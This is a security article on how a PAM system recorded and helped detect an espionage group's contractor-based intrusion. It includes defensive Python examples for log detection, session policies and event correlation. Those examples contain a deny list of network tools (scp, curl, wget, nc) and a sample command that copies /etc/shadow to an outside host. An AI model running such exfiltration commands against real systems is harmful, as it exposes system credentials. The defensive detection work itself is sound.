Incident response of the XXII century: how a PAM system helped detect an attack live
In the article "Reign of king: tactics and tools of the Obstinate Mogwai group" from the Solar 4Rays Cyber Threat Research Center, there is an interesting case of an attack through a contractor. The Solar SafeInspect PAM system installed at the customer played an important role in detecting it.
Initially, Privileged Access Management (PAM) systems were created to control the actions of users with elevated privileges. Over time, it became clear that they also help investigate trusted-relationship attacks and incidents caused by employees and insiders. For example, in 2024, contractors became the "entry point" for 8% of successful cyberattacks.
Therefore, auditors, provider employees and contractors servicing IT systems require the same attention as privileged users. Security requirements mean they cannot simply be granted the rights of regular employees, but a PAM system keeps their sessions in sight. In this material, we detail one such case and the role the PAM system played in countering the attackers.
What is known about the attackers
Obstinate Mogwai is a highly professional, presumably state-sponsored hacker group from East Asia. These attackers engage in cyber espionage and geopolitical intelligence in Russia and neighboring regions. They got their name for the persistence with which they try to re-enter systems even after detection and blocking.
The group's activity has been traced since 2023. Obstinate Mogwai attacks government institutions, IT companies, and their contractors, often exploiting vulnerabilities in public systems, Exchange servers, and compromised contractor credentials. To gain a foothold, the group often uses methods such as .NET deserialization attacks. Their toolkit includes well-known malware such as KingOfHearts and TrochilusRAT, as well as special backdoors like Donnect and DimanoRAT.
Obstinate Mogwai uses legitimate accounts and certificates, privileged accounts, and contractor credentials. One of its goals is to penetrate electronic document management systems. A characteristic feature is manual work with confidential documents during intrusions.
How we detected the attack
Solar specialists saw traces of the attackers in IIS events arriving in the SIEM. These recorded various GET and POST requests to the OWA resource /owa/auth/logon.aspx. The requests came from an address already known as a confirmed indicator of compromise, and they were made under one user's certificate against another user's account data. Detection of these events automatically triggered an investigation.
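The detection described above, as an added example rather than the Solar team's own SIEM rule: a small parser for IIS W3C extended log lines and two rules over the parsed records. The IOC address, the log lines and the mailbox names are constructed for this example; the real indicator from the report is not reproduced on the page. Plain IIS logs do not record which client certificate was presented, so the second rule approximates the "one user's certificate, another user's account" pattern by flagging a single source address that ends up authenticated as several different users.

```python
"""Added example: flag OWA logon activity from known-bad IPs in IIS W3C logs.

The sample log, the IOC address and the user names are constructed for this
example and are not indicators or data from the Solar 4Rays report.
"""
from collections import defaultdict

# Constructed indicator for the example (TEST-NET-3 range); not the real IOC.
IOC_IPS = {"203.0.113.45"}
OWA_AUTH_PATHS = {"/owa/auth/logon.aspx", "/owa/auth.owa"}

SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-03-01 02:14:07 10.0.0.5 GET /owa/auth/logon.aspx url=%2fowa 443 - 203.0.113.45 Mozilla/5.0 200
2025-03-01 02:14:09 10.0.0.5 POST /owa/auth.owa - 443 - 203.0.113.45 Mozilla/5.0 302
2025-03-01 02:14:15 10.0.0.5 GET /owa/ - 443 CORP\\j.smith 203.0.113.45 Mozilla/5.0 200
2025-03-01 02:31:40 10.0.0.5 POST /owa/auth.owa - 443 - 203.0.113.45 Mozilla/5.0 302
2025-03-01 02:31:44 10.0.0.5 GET /owa/ - 443 CORP\\a.ivanova 203.0.113.45 Mozilla/5.0 200
2025-03-01 09:01:00 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 198.51.100.7 Mozilla/5.0 200
2025-03-01 09:01:05 10.0.0.5 GET /owa/ - 443 CORP\\p.orlov 198.51.100.7 Mozilla/5.0 200
"""


def parse_w3c(text):
    """Yield one dict per record, using the #Fields directive as column names."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):            # other directives (#Software, #Date, ...)
            continue
        if fields is None:
            raise ValueError("record before #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            raise ValueError(f"field count mismatch: {line!r}")
        yield dict(zip(fields, values))


def detect(text, ioc_ips=IOC_IPS):
    """Return a list of (rule, c-ip, detail) alerts over the log text."""
    alerts = []
    users_by_ip = defaultdict(set)
    for rec in parse_w3c(text):
        ip = rec["c-ip"]
        # Rule 1: OWA authentication endpoint touched from a known-bad address.
        if rec["cs-uri-stem"].lower() in OWA_AUTH_PATHS and ip in ioc_ips:
            alerts.append(("owa_auth_from_ioc", ip,
                           f'{rec["cs-method"]} {rec["cs-uri-stem"]} at {rec["date"]} {rec["time"]}'))
        if rec["cs-username"] != "-":
            users_by_ip[ip].add(rec["cs-username"])
    # Rule 2: one source address ending up in several mailboxes is the closest
    # approximation of "one user's credential used for another user's account"
    # that plain IIS logs allow without certificate-subject logging.
    for ip, users in users_by_ip.items():
        if len(users) > 1:
            alerts.append(("multi_account_from_single_ip", ip, ",".join(sorted(users))))
    return alerts


if __name__ == "__main__":
    for rule, ip, detail in detect(SAMPLE_IIS_LOG):
        print(f"{rule:30} {ip:15} {detail}")
```

In the constructed log the IOC address hits the logon endpoints three times and is then seen authenticated as two different users, while the second address (normal working hours, a single user) produces no alert.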
The attackers sought to take over Exchange, presumably to gain a foothold in the infrastructure and develop the attack using .NET deserialization. As noted above, this is typical behavior of the "obstinate demon".
Other targets were various employee systems from which the attackers tried to obtain confidential documents and other valuable information. The group was also interested in terminal servers for access to electronic document management.
Incident response of the XXII century is what we call the part of the investigation that established the fact of the attackers' access to sensitive data. This was possible thanks to the Solar SafeInspect PAM system installed in the customer's infrastructure. The system automatically records privileged user sessions, allowing the client's administrators to monitor their activity, so every action (performed at night, incidentally) was recorded. Viewing this blockbuster revealed that the attackers were very familiar with the interface of the not-so-simple electronic document management system. They were interested in various documents related to several Asian countries. Interestingly, the attackers viewed the opened documents page by page, lingering on each page for a few seconds; most likely they were taking screenshots or recording the screen during these pauses.
How the PAM system helps to repel cyberattacks
Solar SafeInspect has a whole set of features that help in such scenarios. For example, the system can detect the launch of commands and applications from a blacklist and then either terminate the session or notify the administrator. For an SSH connection, the commands sent are tracked: launching shell commands, copying files, and so on. For an RDP connection, as in the attack under consideration, detection is based on the window title inside the RDP session. The configuration is done through policies that explicitly allow or prohibit specific actions.
For example, we may know that a given user never launches Word because his work is not related to texts, or that he only accesses a limited list of servers. If someone tries to open Word in his session, the action is blocked and the administrator is notified.
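The policy logic described in the two paragraphs above, as an added example: a blacklist of SSH commands that terminates the session, a per-user server allow-list, and a per-user list of RDP window titles that triggers a notification. The policy format, event shape, user and server names are hypothetical and are not Solar SafeInspect's own configuration or code.

```python
"""Added example: evaluating PAM session events against allow/deny policies.

Policy format, event shape and all names are hypothetical; this is not
Solar SafeInspect's own configuration or code.
"""
from dataclasses import dataclass, field


@dataclass
class Policy:
    user: str                                          # "*" applies to every user
    allowed_servers: set = field(default_factory=set)  # empty = no server restriction
    denied_commands: set = field(default_factory=set)  # SSH: command names to block
    denied_windows: set = field(default_factory=set)   # RDP: window-title substrings to block
    action: str = "notify"                             # "notify" or "terminate"


@dataclass
class SessionEvent:
    proto: str     # "ssh" or "rdp"
    user: str
    server: str
    payload: str   # shell command line (ssh) or current window title (rdp)


# Hypothetical policies: a global blacklist of exfiltration-capable tools that
# kills the session, and a per-user rule for a contractor who should only ever
# touch one server and never open Word.
POLICIES = [
    Policy(user="*", denied_commands={"scp", "curl", "wget", "nc"}, action="terminate"),
    Policy(user="contractor1", allowed_servers={"srv-db-01"},
           denied_windows={"Word"}, action="notify"),
]

SEVERITY = {"allow": 0, "notify": 1, "terminate": 2}


def match(policy, event):
    """Return the reason a policy fires for this event, or None."""
    if policy.user not in ("*", event.user):
        return None
    if policy.allowed_servers and event.server not in policy.allowed_servers:
        return f"server {event.server} not in allow-list"
    if event.proto == "ssh":
        # Naive tokenisation: catches "scp ..." and "cat x | nc host 4444".
        # A real proxy parses the command stream; this only illustrates the idea.
        tokens = event.payload.replace("|", " ").replace(";", " ").split()
        for tok in tokens:
            if tok in policy.denied_commands:
                return f"denied command {tok}"
    elif event.proto == "rdp":
        for needle in policy.denied_windows:
            if needle.lower() in event.payload.lower():
                return f"denied application window matching '{needle}'"
    return None


def evaluate(event, policies=POLICIES):
    """Return (verdict, reason); the most severe matching policy wins."""
    verdict, reason = "allow", ""
    for policy in policies:
        hit = match(policy, event)
        if hit and SEVERITY[policy.action] > SEVERITY[verdict]:
            verdict, reason = policy.action, hit
    return verdict, reason


# Constructed sample events for a quick run.
SAMPLE_EVENTS = [
    SessionEvent("ssh", "admin1", "srv-db-01", "ls -la /var/log"),
    SessionEvent("ssh", "admin1", "srv-web-01", "scp /etc/shadow user@203.0.113.45:/tmp/"),
    SessionEvent("rdp", "contractor1", "srv-db-01", "Document1 - Word"),
    SessionEvent("rdp", "contractor1", "srv-edms-01", "EDMS - Inbox"),
    SessionEvent("rdp", "admin1", "srv-edms-01", "Document1 - Word"),
]


def run_samples(events=SAMPLE_EVENTS):
    """Verdicts for the sample events, in order."""
    return [evaluate(e)[0] for e in events]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        verdict, reason = evaluate(e)
        print(f"{verdict:9} {e.proto} {e.user}@{e.server}: {e.payload!r} {reason}")
```

The severity ordering matters: when a global "terminate" rule and a per-user "notify" rule both fire on the same event, the session is terminated rather than merely reported.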
Integration with a SIEM is possible via syslog, and with DLP, antivirus and other security infrastructure elements via ICAP. Thus the PAM solution becomes a source of data about events on the user's workstation, capable of detecting the download of malware or the upload of confidential information, and of controlling the clipboard.
The company can track chains of events, for example an atypical login to a workstation, followed by authorization on a specific server, followed by an attempt to download information. This significantly simplifies the work of incident investigators, who can prepare correlation rules for a variety of cases.
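An added example of such a chain rule, written against a constructed event stream rather than a real syslog feed: the chain is armed only by a login outside business hours, advanced by the next expected step for the same user, and dropped if the whole sequence does not complete within a window. The event schema, user names, business hours and the 30-minute window are assumptions for this example, not a product rule.

```python
"""Added example: a sequence (chain) correlation rule over PAM/SIEM events.

Event schema, user names, business hours and the 30-minute window are
assumptions for this example; the event stream is constructed, not real data.
"""
from datetime import datetime, timedelta

# Constructed events as (timestamp, user, event_type, detail), the shape a
# syslog feed from the PAM system might be normalised into by a SIEM.
EVENTS = [
    ("2025-03-01 02:10:00", "contractor1", "workstation_login", "ws-17"),
    ("2025-03-01 02:12:30", "contractor1", "server_auth", "srv-edms-01"),
    ("2025-03-01 02:20:05", "contractor1", "file_download", "contracts_2024.pdf"),
    ("2025-03-01 10:00:00", "admin1", "workstation_login", "ws-03"),
    ("2025-03-01 10:05:00", "admin1", "server_auth", "srv-edms-01"),
    ("2025-03-01 10:06:00", "admin1", "file_download", "report.xlsx"),
    ("2025-03-01 03:00:00", "contractor2", "workstation_login", "ws-22"),
    ("2025-03-01 05:30:00", "contractor2", "server_auth", "srv-edms-01"),
    ("2025-03-01 05:31:00", "contractor2", "file_download", "plan.docx"),
]

CHAIN = ("workstation_login", "server_auth", "file_download")
WINDOW = timedelta(minutes=30)     # the whole chain must complete within this
BUSINESS_HOURS = range(8, 20)      # a login outside 08:00-19:59 counts as atypical


def is_atypical_login(ts):
    return ts.hour not in BUSINESS_HOURS


def correlate(events, chain=CHAIN, window=WINDOW):
    """Return [(user, chain_start, trail)] for every completed chain.

    State is kept per user: an atypical first step arms the chain, only the
    next expected step advances it, a normal-hours login disarms it, and an
    expired window discards it.
    """
    state = {}   # user -> (next_step_index, start_ts, trail)
    alerts = []
    for ts_s, user, etype, detail in sorted(events):
        ts = datetime.strptime(ts_s, "%Y-%m-%d %H:%M:%S")
        if etype == chain[0]:
            if is_atypical_login(ts):
                state[user] = (1, ts, [(ts_s, etype, detail)])
            else:
                state.pop(user, None)
            continue
        armed = state.get(user)
        if armed is None:
            continue
        idx, start, trail = armed
        if ts - start > window:
            state.pop(user)
            continue
        if etype == chain[idx]:
            trail.append((ts_s, etype, detail))
            if idx + 1 == len(chain):
                alerts.append((user, start, trail))
                state.pop(user)
            else:
                state[user] = (idx + 1, start, trail)
    return alerts


if __name__ == "__main__":
    for user, start, trail in correlate(EVENTS):
        steps = " -> ".join(f"{e}({d})" for _, e, d in trail)
        print(f"ALERT {user}: chain started {start}: {steps}")
```

With the constructed stream only contractor1 produces an alert: admin1 logs in during business hours, so the chain never arms, and contractor2's night-time login is followed by the server authorization two and a half hours later, outside the window.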
To avoid the risk of compromising passwords to corporate systems, the PAM system can map accounts, allowing employees to authenticate in services using a domain account. It looks like this: the user authenticates with the domain account data with basic privileges, and the PAM system behind the scenes substitutes a privileged account, knowing its login and password.
The advantage is that the user does not have to remember and enter additional passwords, which means they cannot be leaked. To detect the substitution, one has to specifically check which account is actually used for work in the target system. This is not so difficult, but not every attacker will think to do it. In any case, the attacker cannot compromise the mapped account or bypass the PAM layer: he has no understanding of his actual capabilities and no way to obtain the corporate password or other credentials.
If Solar SafeInspect operates in Router mode, the user does not undergo additional explicit authorization and does not know that his actions are controlled and recorded by the PAM system. Because of this, an attacker does not attempt to bypass the protection tool or confine his actions to permissible ones; he acts openly.
The last important PAM function on the list was not used in this case; had it been, the attack would not have taken place at all. But it cannot be ignored, precisely because it is a really powerful option. This is the "Four Eyes" mode, which protects critically important servers: when it is enabled, security personnel receive requests for manual authorization of access to corporate systems, and an administrator must check the request and its legitimacy and then confirm or deny access.
This is an overview of the technical functions of PAM for detecting and blocking cyberattacks. A more detailed analysis of the case is published in the material "Reign of king: tactics and tools of the Obstinate Mogwai group".